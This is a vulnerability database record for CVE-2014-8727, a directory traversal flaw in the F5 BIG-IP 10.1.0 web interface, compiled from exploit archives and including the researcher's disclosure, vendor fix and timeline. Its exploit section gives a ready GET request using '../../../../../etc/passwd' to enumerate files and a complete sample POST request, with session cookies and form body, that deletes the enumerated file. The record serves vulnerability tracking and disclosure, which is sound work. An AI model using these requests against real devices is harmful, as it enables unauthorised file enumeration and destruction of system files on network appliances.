ID

VAR-E-201411-0127


CVE

cve_id:CVE-2014-8727

Trust: 2.4

sources: BID: 71063 // PACKETSTORM: 129084 // EXPLOIT-DB: 35222 // EDBNET: 56437

EDB ID

35222


TITLE

F5 BIG-IP 10.1.0 - Directory Traversal - JSP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 35222

DESCRIPTION

F5 BIG-IP 10.1.0 - Directory Traversal. CVE-2014-8727CVE-114603 . webapps exploit for JSP platform

Trust: 0.6

sources: EXPLOIT-DB: 35222

AFFECTED PRODUCTS

vendor:f5model:big-ipscope:eqversion:10.1.0

Trust: 2.1

vendor:f5model:bigip local traffic managerscope:eqversion:10.1

Trust: 0.3

sources: BID: 71063 // PACKETSTORM: 129084 // EXPLOIT-DB: 35222 // EDBNET: 56437

EXPLOIT

+------------------------------------------------------+
+ F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability +
+------------------------------------------------------+
Affected Product : F5 BIG-IP
Vendor Homepage : http://www.f5.com/
Version : 10.1.0
Vulnerability Category : Local vulnerability
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
CVE : CVE-2014-8727
Patched : Yes

+-------------+
+ Description +
+-------------+
An authenticated user with either "Resource Administrator" or "Administrator" role privileges is able to arbitrary enumerate files and subsequently delete them off the OS level. Any system file deletion, for instance under /etc, /boot etc would have a major functionality and operational impact for the device.

+----------------------+
+ Exploitation Details +
+----------------------+
An authenticated user with either "Resource Administrator" or "Administrator" role privileges is able to enumerate files on the operating system and subsequently delete them off the OS level.

In order to trigger the flaw, send a HTTP GET request similar to: https://<ip>/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd
Condition: If file does not exist the application will return "File not found." If the file exists, the user can either send, a similar to, the next HTTP POST request or simply click on the Delete button through the GUI -the button will be displayed only if the enumerated file exists-.

Sample HTTP POST request:

POST /tmui/Control/form HTTP/1.1
Host: <ip>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<ip>/tmui/Control/jspmap/tmui/system/archive/properties.jsp?name=../../../../../etc/passwd
Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 937

_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete

+----------+
+ Solution +
+----------+
F5 has already patched and mitigated the issue, for more information see ID363027 at the following URL:
https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13109.html
https://support.f5.com/kb/en-us/products/big-ip_ltm/releasenotes/product/relnote_11_0_0_ltm.html

+---------------------+
+ Disclosure Timeline +
+---------------------+
03-11-2014: Vendor notified at security-reporting [at] f5 [dot] com
04-11-2014: Vendor responded with intent to investigate
04-11-2014: Shared details with vendor
05-11-2014: Vendor confirmed the issue is already patched, reference ID363027
12-11-2014: Public disclosure

Trust: 1.0

sources: EXPLOIT-DB: 35222

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 35222

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 35222

TYPE

Directory Traversal

Trust: 1.0

sources: EXPLOIT-DB: 35222

TAGS

tag:exploit

Trust: 0.5

sources: PACKETSTORM: 129084

CREDITS

Anastasios Monachos

Trust: 0.6

sources: EXPLOIT-DB: 35222

EXTERNAL IDS

db:NVDid:CVE-2014-8727

Trust: 2.4

db:EXPLOIT-DBid:35222

Trust: 1.6

db:EDBNETid:56437

Trust: 0.6

db:PACKETSTORMid:129084

Trust: 0.5

db:BIDid:71063

Trust: 0.3

sources: BID: 71063 // PACKETSTORM: 129084 // EXPLOIT-DB: 35222 // EDBNET: 56437

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2014-8727

Trust: 2.1

url:https://www.exploit-db.com/exploits/35222/

Trust: 0.6

url:https://support.f5.com/kb/en-us/products/big-ip_ltm/releasenotes/product/relnote_11_0_0_ltm.html

Trust: 0.3

url:http://www.f5.com/products/big-ip/

Trust: 0.3

sources: BID: 71063 // PACKETSTORM: 129084 // EXPLOIT-DB: 35222 // EDBNET: 56437

SOURCES

db:BIDid:71063
db:PACKETSTORMid:129084
db:EXPLOIT-DBid:35222
db:EDBNETid:56437

LAST UPDATE DATE

2022-07-27T09:51:59.168000+00:00


SOURCES UPDATE DATE

db:BIDid:71063date:2015-03-19T08:08:00

SOURCES RELEASE DATE

db:BIDid:71063date:2014-11-12T00:00:00
db:PACKETSTORMid:129084date:2014-11-12T19:36:40
db:EXPLOIT-DBid:35222date:2014-11-13T00:00:00
db:EDBNETid:56437date:2014-11-13T00:00:00